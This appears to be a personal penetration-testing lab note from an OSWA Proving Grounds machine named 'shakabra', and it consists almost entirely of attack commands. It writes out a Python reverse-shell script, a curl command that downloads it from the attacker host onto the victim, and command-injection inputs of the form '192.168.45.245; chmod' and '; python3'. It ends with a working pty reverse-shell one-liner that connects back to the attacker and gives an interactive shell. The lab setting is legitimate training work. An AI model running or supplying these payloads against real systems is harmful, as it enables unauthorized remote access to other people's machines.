### pentestmonkey.py
created `pentestmonkey.py`
```bash
â”Œâ”€â”€(rootðŸ’€gobots)-[13Jan2025 23:06:31]-[/home/â€¦/SUT/OSWA/proving_grounds/shakabra]
â””â”€# cat pentestmonkey.py 
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.45.245",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/bash","-i"]);          
```
pulled over to victim with `curl http://192.168.45.245/pentestmonkey.py -o /tmp/pentestmonkey.py`
![[Pasted image 20250113180901.png]]
proof was pulled over
![[Pasted image 20250113181003.png]]
making `executable` `192.168.45.245; chmod 755 /tmp/pentestmonkey.py`
![[Pasted image 20250113181129.png]]
making sure it became executable with `192.168.45.245; ls -la /tmp`
![[Pasted image 20250113181222.png]]
was unable to execute the `pentestmonkey.py` script with `192.168.45.245; python3 /tmp/pentestmonkey.py` in order to get it to work I had to just execute the script  utilizing the revshells
![[Pasted image 20250113182414.png]]
```python3
192.168.45.245; python3 -c 'import os,pty,socket;s=socket.socket();s.connect(("192.168.45.245",80));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn("sh")'
```
got a `reverse shell`
![[Pasted image 20250113182440.png]]